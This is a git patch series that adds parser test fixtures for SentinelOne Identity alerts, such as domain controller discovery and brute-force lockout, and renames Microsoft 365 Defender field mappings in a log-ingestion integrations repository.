+    "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:54:58Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+      "start": "2024-11-22T09:54:58Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:54:58Z",
+    "file": {
+      "hash": {
+        "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+      },
+      "name": "cmd.exe",
+      "path": "c:\\windows\\system32\\cmd.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "\"C:\\Windows\\system32\\cmd.exe\""
+    },
+    "related": {
+      "hash": [
+        "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "0193534d-63c1-7497-b854-b883425af3f5",
+        "name": "Domain Controller Discovery Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json
new file mode 100644
index 000000000..e43c64e20
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_6.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:45:51Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.",
+      "start": "2024-11-22T09:45:51Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:45:51Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935347-abf7-7457-8467-e3443470e6f3",
+        "name": "AD Domain Computer Enumeration Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json
new file mode 100644
index 000000000..d4acce26a
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_7.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:45:51Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+      "start": "2024-11-22T09:45:51Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:45:51Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935347-b05a-7d28-a929-5294ee16628a",
+        "name": "Domain Controller Discovery Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json
new file mode 100644
index 000000000..384a41648
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_8.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:45:07.655000Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised for default administrator account logon anywhere in the domain.",
+      "start": "2024-11-22T09:45:07.655000Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:45:07.655000Z",
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "UNKNOWN",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935342-d073-7ed0-8c5e-2373fc013310",
+        "name": "Default Admin Account Usage",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json
new file mode 100644
index 000000000..74ab3a7f3
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_9.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:10:09.467000Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+      "start": "2024-11-22T09:10:09.467000Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:10:09.467000Z",
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "UNKNOWN",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4",
+        "name": "Brute force attack - Mass Account Lockout",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file

From e898b653c1cbe982f1f50db26b795f2e018db548 Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Wed, 27 Nov 2024 12:20:13 +0200
Subject: [PATCH 287/317] Apply linter

---
 SentinelOne/identity/_meta/smart-descriptions.json | 2 +-
 SentinelOne/identity/ingest/parser.yml             | 2 +-
 SentinelOne/identity/tests/test_alert_2.json       | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json
index ad570cb92..e09c5db80 100644
--- a/SentinelOne/identity/_meta/smart-descriptions.json
+++ b/SentinelOne/identity/_meta/smart-descriptions.json
@@ -43,4 +43,4 @@
       }
     ]
   }
-]
\ No newline at end of file
+]
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
index 507745cb7..79cd3ec9f 100644
--- a/SentinelOne/identity/ingest/parser.yml
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -64,4 +64,4 @@ stages:
           sentinelone.identity.classification: "{{json_event.message.classification}}"
           sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}"
           sentinelone.identity.result: "{{json_event.message.result}}"
-          sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
\ No newline at end of file
+          sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
index 6d697a5be..39420a5e0 100644
--- a/SentinelOne/identity/tests/test_alert_2.json
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -19,4 +19,4 @@
       }
     }
   }
-}
+}
\ No newline at end of file

From 5421cd89a9054a25770e7ce2e8e8ef1c1c018655 Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Wed, 27 Nov 2024 12:21:17 +0200
Subject: [PATCH 288/317] Fix datasources

---
 SentinelOne/identity/_meta/manifest.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 449172f8a..33be89396 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -6,3 +6,4 @@ description: >-
   SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
 
 data_sources:
+  Application logs: activites performed on SentinelOne infrastructure are logged

From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Wed, 27 Nov 2024 16:45:52 +0100
Subject: [PATCH 289/317] Changes on custom fields

---
 .../microsoft-365-defender/_meta/fields.yml   | 254 ++++++++----------
 .../microsoft-365-defender/ingest/parser.yml  |  74 +++--
 .../tests/test_device_event.json              |  22 +-
 ...test_device_event_sensitive_file_read.json |  22 +-
 .../tests/test_device_events_2.json           |   4 +-
 ...test_device_events_get_clipboard_data.json |  22 +-
 ...test_device_events_powershell_command.json |  22 +-
 ..._device_events_shell_link_create_file.json |  22 +-
 .../tests/test_device_file_event.json         |  24 +-
 .../tests/test_device_file_event_02.json      |  24 +-
 .../tests/test_device_image_load_event.json   |  10 +-
 .../tests/test_device_logon_events.json       |   6 +-
 .../tests/test_device_network_events.json     |  26 +-
 .../tests/test_device_process_events.json     |  42 ++-
 .../tests/test_device_process_events_2.json   |  42 ++-
 .../tests/test_device_registry_events.json    |  24 +-
 .../test_devices_events_script_content.json   |   4 +-
 .../tests/test_email_events.json              |  22 +-
 .../tests/test_email_url_info.json            |  22 +-
 .../tests/test_identity_directory.json        |  22 +-
 .../tests/test_identity_info.json             |  22 +-
 .../tests/test_identity_logon.json            |  22 +-
 .../tests/test_identity_query.json            |  22 +-
 .../tests/test_local_ip.json                  |  22 +-
 .../tests/test_process_error.json             |  12 +-
 25 files changed, 364 insertions(+), 446 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index 0e6154ccd..c92ffb8db 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -133,6 +133,78 @@ action.properties.ISP:
   name: action.properties.ISP
   type: keyword
 
+action.properties.InitiatingProcessAccountObjectId:
+  description: Azure AD object ID of the user account that ran the process responsible
+    for the event
+  name: action.properties.InitiatingProcessAccountObjectId
+  type: keyword
+
+action.properties.InitiatingProcessCommandLine:
+  description: Process commande Line that initiated the event
+  name: action.properties.InitiatingProcessCommandLine
+  type: keyword
+
+action.properties.InitiatingProcessFileSize:
+  description: Size of the process (image file) that initiated the event
+  name: action.properties.InitiatingProcessFileSize
+  type: long
+
+action.properties.InitiatingProcessIntegrityLevel:
+  description: Integrity level of the process that initiated the event. Windows assigns
+    integrity levels to processes based on certain characteristics, such as if they
+    were launched from an internet download. These integrity levels influence permissions
+    to resources
+  name: action.properties.InitiatingProcessIntegrityLevel
+  type: keyword
+
+action.properties.InitiatingProcessLogonId:
+  description: Identifier for a logon session of the process that initiated the event.
+    This identifier is unique on the same machine only between restarts.
+  name: action.properties.InitiatingProcessLogonId
+  type: keyword
+
+action.properties.InitiatingProcessTokenElevation:
+  description: Token type indicating the presence or absence of User Access Control
+    (UAC) privilege elevation applied to the process that initiated the event
+  name: action.properties.InitiatingProcessTokenElevation
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoCompanyName:
+  description: Company name from the version information of the process (image file)
+    responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoCompanyName
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoFileDescription:
+  description: Description from the version information of the process (image file)
+    responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoFileDescription
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoInternalFileName:
+  description: Internal file name from the version information of the process (image
+    file) responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoInternalFileName
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoOriginalFileName:
+  description: Original file name from the version information of the process (image
+    file) responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoOriginalFileName
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoProductName:
+  description: Product name from the version information of the process (image file)
+    responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoProductName
+  type: keyword
+
+action.properties.InitiatingProcessVersionInfoProductVersion:
+  description: Product version from the version information of the process (image
+    file) responsible for the event
+  name: action.properties.InitiatingProcessVersionInfoProductVersion
+  type: keyword
+
 action.properties.IsAdminOperation:
   description: Indicates whether the activity was performed by an administrator
   name: action.properties.IsAdminOperation
@@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName:
   name: action.properties.PreviousRegistryValueName
   type: keyword
 
+action.properties.ProcessIntegrityLevel:
+  description: Integrity level of the newly created process. Windows assigns integrity
+    levels to processes based on certain characteristics, such as if they were launched
+    from an internet downloaded. These integrity levels influence permissions to resources
+  name: action.properties.ProcessIntegrityLevel
+  type: keyword
+
+action.properties.ProcessTokenElevation:
+  description: Token type indicating the presence or absence of User Access Control
+    (UAC) privilege elevation applied to the newly created process
+  name: action.properties.ProcessTokenElevation
+  type: keyword
+
+action.properties.ProcessVersionInfoCompanyName:
+  description: Company name from the version information of the newly created process
+  name: action.properties.ProcessVersionInfoCompanyName
+  type: keyword
+
+action.properties.ProcessVersionInfoFileDescription:
+  description: Description from the version information of the newly created process
+  name: action.properties.ProcessVersionInfoFileDescription
+  type: keyword
+
+action.properties.ProcessVersionInfoInternalFileName:
+  description: Internal file name from the version information of the newly created
+    process
+  name: action.properties.ProcessVersionInfoInternalFileName
+  type: keyword
+
+action.properties.ProcessVersionInfoOriginalFileName:
+  description: Original file name from the version information of the newly created
+    process
+  name: action.properties.ProcessVersionInfoOriginalFileName
+  type: keyword
+
+action.properties.ProcessVersionInfoProductName:
+  description: Product name from the version information of the newly created process
+  name: action.properties.ProcessVersionInfoProductName
+  type: keyword
+
+action.properties.ProcessVersionInfoProductVersion:
+  description: Product version from the version information of the newly created process
+  name: action.properties.ProcessVersionInfoProductVersion
+  type: keyword
+
 action.properties.Query:
   description: String used to run the query
   name: action.properties.Query
@@ -412,143 +529,6 @@ action.properties.UserLevelPolicy:
   name: action.properties.UserLevelPolicy
   type: keyword
 
-action.properties.process.AccountObjectId:
-  description: Azure AD object ID of the user account that ran the process responsible
-    for the event
-  name: action.properties.process.AccountObjectId
-  type: keyword
-
-action.properties.process.CommandLine:
-  description: Process commande Line that initiated the event
-  name: action.properties.process.CommandLine
-  type: keyword
-
-action.properties.process.FileSize:
-  description: Size of the process (image file) that initiated the event
-  name: action.properties.process.FileSize
-  type: long
-
-action.properties.process.IntegrityLevel:
-  description: Integrity level of the newly created process. Windows assigns integrity
-    levels to processes based on certain characteristics, such as if they were launched
-    from an internet downloaded. These integrity levels influence permissions to resources
-  name: action.properties.process.IntegrityLevel
-  type: keyword
-
-action.properties.process.LogonId:
-  description: Identifier for a logon session of the process that initiated the event.
-    This identifier is unique on the same machine only between restarts.
-  name: action.properties.process.LogonId
-  type: keyword
-
-action.properties.process.TokenElevation:
-  description: Token type indicating the presence or absence of User Access Control
-    (UAC) privilege elevation applied to the newly created process
-  name: action.properties.process.TokenElevation
-  type: keyword
-
-action.properties.process.VersionInfoCompanyName:
-  description: Company name from the version information of the newly created process
-  name: action.properties.process.VersionInfoCompanyName
-  type: keyword
-
-action.properties.process.VersionInfoFileDescription:
-  description: Description from the version information of the newly created process
-  name: action.properties.process.VersionInfoFileDescription
-  type: keyword
-
-action.properties.process.VersionInfoInternalFileName:
-  description: Internal file name from the version information of the newly created
-    process
-  name: action.properties.process.VersionInfoInternalFileName
-  type: keyword
-
-action.properties.process.VersionInfoOriginalFileName:
-  description: Original file name from the version information of the newly created
-    process
-  name: action.properties.process.VersionInfoOriginalFileName
-  type: keyword
-
-action.properties.process.VersionInfoProductName:
-  description: Product name from the version information of the newly created process
-  name: action.properties.process.VersionInfoProductName
-  type: keyword
-
-action.properties.process.VersionInfoProductVersion:
-  description: Product version from the version information of the newly created process
-  name: action.properties.process.VersionInfoProductVersion
-  type: keyword
-
-action.properties.process.parent.AccountObjectId:
-  description: Azure AD object ID of the user account that ran the parent process
-    responsible for the event
-  name: action.properties.process.parent.AccountObjectId
-  type: keyword
-
-action.properties.process.parent.CommandLine:
-  description: Parent process commande Line that initiated the event
-  name: action.properties.process.parent.CommandLine
-  type: keyword
-
-action.properties.process.parent.FileSize:
-  description: Size of the parent process (image file) that initiated the event
-  name: action.properties.process.parent.FileSize
-  type: long
-
-action.properties.process.parent.IntegrityLevel:
-  description: Integrity level of the parent process that initiated the event. Windows
-    assigns integrity levels to processes based on certain characteristics, such as
-    if they were launched from an internet download. These integrity levels influence
-    permissions to resources
-  name: action.properties.process.parent.IntegrityLevel
-  type: keyword
-
-action.properties.process.parent.LogonId:
-  description: Identifier for a logon session of the parent process that initiated
-    the event. This identifier is unique on the same machine only between restarts.
-  name: action.properties.process.parent.LogonId
-  type: keyword
-
-action.properties.process.parent.TokenElevation:
-  description: Token type indicating the presence or absence of User Access Control
-    (UAC) privilege elevation applied to the parent process that initiated the event
-  name: action.properties.process.parent.TokenElevation
-  type: keyword
-
-action.properties.process.parent.VersionInfoCompanyName:
-  description: Company name from the version information of the parent process (image
-    file) responsible for the event
-  name: action.properties.process.parent.VersionInfoCompanyName
-  type: keyword
-
-action.properties.process.parent.VersionInfoFileDescription:
-  description: Description from the version information of the parent process (image
-    file) responsible for the event
-  name: action.properties.process.parent.VersionInfoFileDescription
-  type: keyword
-
-action.properties.process.parent.VersionInfoInternalFileName:
-  description: Internal file name from the version information of the parent process
-    (image file) responsible for the event
-  name: action.properties.process.parent.VersionInfoInternalFileName
-  type: keyword
-
-action.properties.process.parent.VersionInfoOriginalFileName:
-  description: ''
-  name: action.properties.process.parent.VersionInfoOriginalFileName
-  type: keyword
-
-action.properties.process.parent.VersionInfoProductName:
-  description: ''
-  name: action.properties.process.parent.VersionInfoProductName
-  type: keyword
-
-action.properties.process.parent.VersionInfoProductVersion:
-  description: Product version from the version information of the parent process
-    (image file) responsible for the event
-  name: action.properties.process.parent.VersionInfoProductVersion
-  type: keyword
-
 email.direction:
   description: The direction of the message based on the sending and receiving domains
   name: email.direction
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 0a33f577f..fc32171cd 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -263,18 +263,18 @@ stages:
           process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
           process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
           process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
-          action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
-          action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
-          action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
-          action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
-          action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
-          action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
-          action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
-          action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
-          action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
-          action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
-          action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
-          action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+          action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+          action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+          action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+          action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+          action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+          action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+          action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+          action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+          action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+          action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+          action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 
       - set:
           process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
@@ -307,26 +307,26 @@ stages:
           process.name: "{{json_event.message.properties.FileName | basename}}"
